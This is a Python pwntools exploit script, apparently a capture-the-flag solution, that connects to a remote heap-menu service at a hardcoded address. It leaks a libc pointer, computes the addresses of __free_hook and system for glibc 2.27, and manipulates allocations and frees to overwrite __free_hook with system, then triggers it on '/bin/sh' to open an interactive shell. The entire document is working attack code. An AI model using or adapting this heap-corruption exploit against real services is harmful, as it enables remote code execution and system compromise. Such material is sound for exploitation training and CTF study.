from pwn import *
rhp = {'host': '133.242.68.223', 'port':58396}

libc = ELF('./libc-2.27.so')
offset_libc_stdin = libc.symbols[b'_IO_2_1_stdin_']
offset_libc_free_hook = libc.symbols[b'__free_hook']
offset_libc_system = libc.symbols[b'system']

conn = remote(rhp['host'], rhp['port'])

log.info(conn.recvline()) 
log.info(conn.recvline()) 
res = conn.recvline()
log.info(res) 
log.info(conn.recv())
print(res[6:20])
stdin_addr = int(res[6:20], 16)
print(stdin_addr)

free_hook_addr = stdin_addr - offset_libc_stdin + offset_libc_free_hook
system_addr = stdin_addr - offset_libc_stdin + offset_libc_system

conn.sendline("1")
print(1)
log.info(conn.recv()) 
conn.sendline("hoge")
print("hoge")
log.info(conn.recv()) 
conn.sendline("2")
print(2)
log.info(conn.recv()) 
conn.sendline("2")
print(2)
log.info(conn.recv()) 
conn.sendline("3")
print(3)
log.info(conn.recv()) 
conn.sendline("1")
print(1)
log.info(conn.recv()) 
conn.sendline(p64(free_hook_addr))
print(p64(free_hook_addr))
log.info(conn.recv()) 
conn.sendline("3")
print(3)
log.info(conn.recv()) 
conn.sendline("1")
print(1)
log.info(conn.recv()) 
conn.sendline("hoge")
print("hoge")
log.info(conn.recv()) 
conn.sendline("3")
print(3)
log.info(conn.recv()) 
conn.sendline("1")
print(1)
log.info(conn.recv()) 
conn.sendline(p64(system_addr))
print(p64(system_addr))
log.info(conn.recv()) 
conn.sendline("3")
print(3)
log.info(conn.recv()) 
conn.sendline("1")
print(1)
log.info(conn.recv()) 
conn.sendline("/bin/sh")
print("/bin/sh")
log.info(conn.recv()) 
conn.sendline("2")
print(2)

conn.interactive()